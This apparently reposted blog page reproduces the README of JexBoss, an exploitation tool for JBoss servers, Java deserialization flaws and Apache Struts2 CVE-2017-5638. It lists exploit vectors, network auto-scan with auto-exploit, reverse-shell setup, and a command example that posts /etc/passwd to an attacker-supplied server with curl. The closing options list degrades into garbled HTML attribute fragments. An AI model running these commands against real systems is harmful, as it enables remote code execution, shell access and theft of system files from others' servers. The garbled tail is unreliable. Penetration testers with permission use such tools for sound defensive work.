JexBoss - Jboss (and Java Deserialization Vulnerabilities) verify and Exploitation Tool


JexBoss - Jboss (and Java Deserialization Vulnerabilities) verify and Exploitation Tool

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc.

Requirements:

  • Python >= 2.7.x
  • urllib3
  • ipaddress

Installation on Linux\Mac

To install the latest version of JexBoss, please use the following commands:
git clone https://github.com/joaomatosf/jexboss.git
 cd jexboss
 pip install -r requires.txt
 python jexboss.py -h
 python jexboss.py -host http://target_host:8080
 
 OR:
 
 Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip
 unzip master.zip
 cd jexboss-master
 pip install -r requires.txt
 python jexboss.py -h
 python jexboss.py -host http://target_host:8080
 
If you are using CentOS with Python 2.6, please install Python2.7. Installation example of the Python 2.7 on CentOS using Collections Software scl:
yum -y install centos-release-scl
 yum -y install python27
 scl enable python27 bash
 

Installation on Windows

If you are using Windows, you can use the Git Bash to run the JexBoss. Follow the steps below:
  • Download and install Python
  • Download and install Git for Windows
  • After installing, run the Git for Windows and type the following commands:
PATH=$PATH:C:\Python27\
 PATH=$PATH:C:\Python27\Scripts
 git clone https://github.com/joaomatosf/jexboss.git
 cd jexboss
 pip install -r requires.txt
 python jexboss.py -h
 python jexboss.py -host http://target_host:8080
 

Features:

The tool and exploits were developed and tested for:
  • JBoss Application Server versions: 3, 4, 5 and 6.
  • Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)

The exploitation vectors are:
  • /admin-console
    • tested and working in JBoss versions 5 and 6
  • /jmx-console
    • tested and working in JBoss versions 4, 5 and 6
  • /web-console/Invoker
    • tested and working in JBoss versions 4, 5 and 6
  • /invoker/JMXInvokerServlet
    • tested and working in JBoss versions 4, 5 and 6
  • Application Deserialization
    • tested and working against multiple Java applications, platforms, etc, via HTTP POST Parameters
  • Servlet Deserialization
    • tested and working against multiple Java applications, platforms, etc, via servlets that process serialized objects (e.g. when you see an "Invoker" in a link)
  • Apache Struts2 CVE-2017-5638
    • tested in Apache Struts 2 applications
  • Others

Videos:

  • Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss

  • Exploiting JBoss Application Server with JexBoss

  • Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)

Screenshots:

  • Simple usage examples:
$ python jexboss.py
  • Example of standalone mode against JBoss:
$ python jexboss.py -u http://192.168.0.26:8080
  • Usage modes:
$ python jexboss.py -h

  • Network scan mode:
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 
 -results results.txt
  • Network scan with auto-exploit mode:
$ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 
 -results results.txt

  • Results and recommendations:

Reverse Shell (meterpreter integration)

After you exploit a JBoss server, you can use the own jexboss command shell or perform a reverse connection using the following command:
jexremote=YOUR_IP:YOUR_PORT
 
 Example:
 Shell>jexremote=192.168.0.10:4444
  • Example:

When exploiting java deserialization vulnerabilities (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute.

Usage Examples:

  • For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H 
 parameter_name --cmd 'curl -d@/etc/passwd http://your_server'
 

  • For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H 
 parameter_name
 

  • For Java Deserialization Vulnerabilities in a Servlet (like Invoker):
$ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize
 

  • For Apache Struts 2 (CVE-2017-5638)
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2
 

  • For Apache Struts 2 (CVE-2017-5638) with cookies for authenticated resources
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 
 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
 

  • Auto scan mode:
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 
 -results report_auto_scan.log
 

  • File scan mode:
$ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log
 


  • More Options:
optional arguments:
   -h, --help            show this help message and exit
   --version             show program's version number and exit
   --auto-exploit, -A    Send exploit code automatically (USE ONLY IF YOU HAVE
                         PERMISSION!!!)
   --disable-check-updates, -D
                         Disable two updates checks: 1) Check for updates
                         performed by the webshell in exploited server at
                         http://webshell.jexboss.net/jsp_version.txt and 2)
                         check for updates performed by the jexboss client at
                         http://joaomatosf.com/rnp/releases.txt
   -mode {standalone,auto-scan,file-scan}
                         Operation mode (DEFAULT: standalone)
   --app-unserialize, -j
                         Check for java unserialization vulnerabilities in HTTP
                         parameters (eg. javax.faces.ViewState, oldFormData,
                         etc)
   --servlet-unserialize, -l
                         Check for java unserialization vulnerabilities in
                         Servlets (like Invoker interfaces)
   --jboss               Check only for JBOSS vectors.
   --jenkins             Check only for Jenkins CLI vector.
   --jmxtomcat           Check JMX JmxRemoteLifecycleListener in Tomcat
                         (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be
                         checked by default.
   --proxy PROXY, -P PROXY
                         Use a http proxy to connect to the target URL (eg. -P
                         http://192.168.0.1:3128)
   --proxy-cred LOGIN:PASS, -L LOGIN:PASS
                         Proxy authentication credentials (eg -L name:password)
   --jboss-login LOGIN:PASS, -J LOGIN:PASS
                         JBoss login and password for exploit admin-console in
                         JBoss 5 and JBoss 6 (default: admin:admin)
   --timeout TIMEOUT     Seconds to wait before timeout connection (default 3)
 
 Standalone mode:
   -host HOST, -u HOST   Host address to be checked (eg. -u
                         http://192.168.0.10:8080)
 
 Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):
   --reverse-host RHOST:RPORT, -r RHOST:RPORT
                         Remote host address and port for reverse shell when
                         exploiting Java Deserialization Vulnerabilities in
                         application layer (for now, working only against *nix
                         systems)(eg. 192.168.0.10:1331)
   --cmd CMD, -x CMD     Send specific command to run on target (eg. curl -d
                         @/etc/passwd http://your_server)
   --windows, -w         Specifies that the commands are for rWINDOWS System$
                         (cmd.exe)
   --post-parameter PARAMETER, -H PARAMETER
                         Specify the parameter to find and inject serialized
                         objects into it. (egs. -H javax.faces.ViewState or -H
                         oldFormData (<- --force="" --gadget="" --load-gadget="" br="" style="outline: 0px; transition: all 0.17s ease;">                         --show-payload="" -f="" -file="" -network="" -out="" 
                         -ports="" -results="" -t="" -u="" 10.0.0.0="" 8080="" 
                         a="" and="" auto="" automatically.="" base64="" be="" 
                         by="" checked="" cidr="" commas="" 
                         commons-collections3.1="" commons-collections4.0="" 
                         content-types.="" different="" each="" eg.="" file="" 
                         filename="" filename_hosts="" filename_results="" 
                         for="" force="" format="" formats="" from="" gadget="" 
                         gadgets="" generate="" generated="" groovy1="" gziped="" 
                         hi="" host="" in="" informed="" java="" 
                         javax.faces.viewstate="" jenkins="" line="" list="" 
                         mode:="" mode="" multiple="" name="" network="" 
                         object="" of="" one="" or="" others="" own="" 
                         parameter.="" payload.="" payload="" paypal="X)" 
                         per="" ports="" pre="" print="" provide="" raw="" 
                         results="" scan="" scanned="" send="" separated="" 
                         serialized="" specify="" store="" the="" this="" to="" 
                         type="" url="" will="" with="" your="">
 


تعليقات

المشاركات الشائعة من هذه المدونة